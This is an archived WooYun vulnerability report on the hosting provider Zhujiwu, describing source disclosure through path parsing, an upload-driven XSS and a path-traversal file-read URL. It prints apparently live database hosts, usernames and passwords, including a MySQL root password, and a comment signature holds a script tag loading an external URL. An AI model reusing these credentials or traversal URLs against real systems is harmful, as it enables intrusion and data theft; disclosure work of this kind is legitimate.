当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0146383

漏洞标题:主机屋某奇葩配置导致源码泄露(数据库可外连)

相关厂商:主机屋

漏洞作者: 1c3z

提交时间:2015-10-13 12:36

修复时间:2015-10-18 12:38

公开时间:2015-10-18 12:38

漏洞类型:系统/服务运维配置不当

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-10-13: 细节已通知厂商并且等待厂商处理中
2015-10-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

其实也不奇葩啦。。
有xss 有任意文件读取。。

详细说明:

源码泄露

选区_067.png


但是他的数据库配置文件在非web目录,

选区_068.png


接下来找上传了,发现一个提交工单的地方,但是。。。

选区_069.png


结合
www.zhujiwu.com/usercenter/service/gd_add.asp/1.php
www.zhujiwu.com/usercenter/cmd/gd_cmd.asp/1.php
还是把工单传上去了

选区_056.png


然后就xss来了。。

选区_057.png


这域名,还是放弃吧。
但是工单里有个图片展示的地方,可以读取文件。
www.zhujiwu.com/inc/show_img.asp?file_path=d:/wwwroothttps://wooyun-img.oss-cn-beijing.aliyuncs.com/upload/../global/Function.asp

选区_070.png


全部在公网,可以连接。。

case "vhost":    db_addr="182.18.23.119,2888"   
db_User="zhujiwu"
db_Pwd="dfg8j5Rthgfd9g"
db_name="zhujiwu"
case "dns": db_addr="182.18.22.7,2012"
db_User="dnsuser"
db_Pwd="87kh5sgy0kg4ajWdf"
db_name="vhost"
case "beian" db_addr="182.18.23.119,2888"
db_User="zhujiwubeian-v2"
db_Pwd="zhujiwubeian-v2-lihongbin"
db_name="beian-v2"
case "zjw_old" db_addr="182.18.22.22,2888"
db_User="zhujiwu"
db_Pwd="dfWUtger82645hjdf875"
db_name="vhost"
case "iislog" db_addr="182.18.22.111,2014"
db_User="iislog"
db_Pwd="gongyuanyihao"
db_name="iislog"
end select
dim Conn_db,Conn_db_str
set Conn_db=server.createobject("adodb.connection")
if db="wall" then
Conn_db_str="driver={MySQL ODBC 5.1 Driver};server=182.18.22.99;database=wall;uid=root;password=P47PyfyXFNABzpdN"


选区_058.png


选区_060.png


选区_061.png


选区_063.png


选区_064.png


选区_065.png


选区_066.png


备案信息

选区_071.png


选区_072.png


选区_073.png

漏洞证明:

如上

修复方案:

xss方面,html编码
任意文件读取,过滤
源码泄露,这个就不知道了,猜测是fast_cgi的问题

版权声明:转载请注明来源 1c3z@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-18 12:38

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无


漏洞评价:

评论

  1. 2015-10-13 19:29 | 木木小子 ( 实习白帽子 | Rank:91 漏洞数:13 | <script src=http://t.cn/RLL8vaU></script...)

    目测忽略